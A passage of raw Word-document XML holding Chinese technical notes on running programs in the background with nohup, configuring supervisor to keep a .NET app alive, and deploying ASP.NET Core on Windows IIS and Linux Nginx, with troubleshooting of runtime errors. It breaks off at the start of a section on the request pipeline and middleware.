        <w:t xml:space="preserve"> 来让程序在后台运行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它的语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nohup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>用途：不挂断地运行命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>语法：nohup Command [ Arg … ] [　&amp; ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>　　无论是否将 nohup 命令的输出重定向到终端，输出都将附加到当前目录的 nohup.out 文件中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>用途：在后台运行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>一般两个一起用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nohup command &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用supervisor自动发布程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>supervisor管理进程，是通过fork/exec的方式将这些被管理的进程当作supervisor的子进程来启动，所以我们只需要将要管理进程的可执行文件的路径添加到supervisor的配置文件中就好了。此时被管理进程被视为supervisor的子进程，若该子进程异常中断，则父进程可以准确的获取子进程异常中断的信息，通过在配置文件中设置autostart=ture，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>可以实现对异常中断的子进程的自动重启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>首先我们要安装supervisor，在终端输入：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>yum install supervisor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>启动：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>systemctl start supervisord.service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>service supervisord start</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>重启：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>systemctl restart supervisord.service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>service supervisord restart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>然后就可以开始配置要发布的程序路径了，打开在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/etc/supervisord.d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件夹中新建一个ini文件，写入以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[program:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>项目名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>directory=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/usr/dotnetRelease #发布文件夹</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>command=/usr/bin/dotnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/dotnetRelease/app.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>#当这个程序启动时的命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>stdout_logfile=/data/output/logs/out.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>#输出日志目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>stderr_logfile=/data/output/logs/err.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>#错误日志目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>好了输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>service supervisord restart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">重启下，然后执行ps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ef|grep dotnet查看下是否运行了，要注意的是日志目录一定要存在哦</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://supervisord.org/configuration.html%23program-x-section-settings" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http://supervisord.org/configuration.html#program-x-section-settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.jianshu.com/p/0226b7c59ae2" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Supervisor的作用与配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASP.NET Core程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先说下Window的发布步骤，我的服务器是Windows Server 2008 R2，首先下载.Net Core SDK和 Hosting，前者是运行.NET Core程序必备的环境，后者是让ASP.NET Core能在IIS上运行的必备工具，它让IIS服务器作为反向代理，转发到kestrel服务器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要注意的是版本的问题，如果版本不匹配有可能会出现“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>502Error 502.5 - Process Failure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”这个问题。解决步骤是执行dotnet命令运行程序，看看它提示什么错误，然后结合搜索引擎来处理问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我这里碰到的第一个问题是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>Failed to load the dll from [C:\Program Files\dotnet\host\fxr\2.1.2\hostfxr.dll], HRESULT: 0x80070057</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>The library hostfxr.dll was found, but loading it from C:\Program Files\dotnet\host\fxr\2.1.2\hostfxr.dll failed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Installing .NET Core prerequisites might help resolve this problem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://go.microsoft.com/fwlink/?LinkID=798306&amp;clcid=0x409" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>http://go.microsoft.com/fwlink/?LinkID=798306&amp;clcid=0x409</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>百度之后发现需要下载个补丁： https://support.microsoft.com/en-us/kb/2533623</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第二个问题是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>It was not possible to find any compatible framework version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The specified framework 'Microsoft.AspNetCore.App', version '2.1.4' was not found.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Check application dependencies and target a framework version installed at:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      C:\Program Files\dotnet\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Installing .NET Core prerequisites might help resolve this problem:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      http://go.microsoft.com/fwlink/?LinkID=798306&amp;clcid=0x409</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  - The .NET Core framework and SDK can be installed from:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      https://aka.ms/dotnet-download</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  - The following versions are installed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      2.1.2 at [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>这个问题是因为我只安装了Hosting而没有安装.NET Core SDK造成的，安装SDK后就能正常运行了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Linux平台安装就比较简单了，先安装.N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>t Core Runtime，然后安装Nginx，配置Nginx反向代理，并启动dotnet即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管道与中间件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ASP.NET Core管道和ASP.NET的事件驱动的管道有很大的不同，现在你可以在Startup文件的Configure方法中调用Use,UseWhen,Map,MapWhen,Run方法来为特定的请求增加特定的处理逻辑。可以实现防盗链，日志，权限认证，事务处理等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>它的管线图如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3587115" cy="2296160"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="36" name="图片 4" descr="C:\Users\Administrator\Desktop\request-delegate-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descr="C:\Users\Administrator\Desktop\request-delegate-pipeline.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
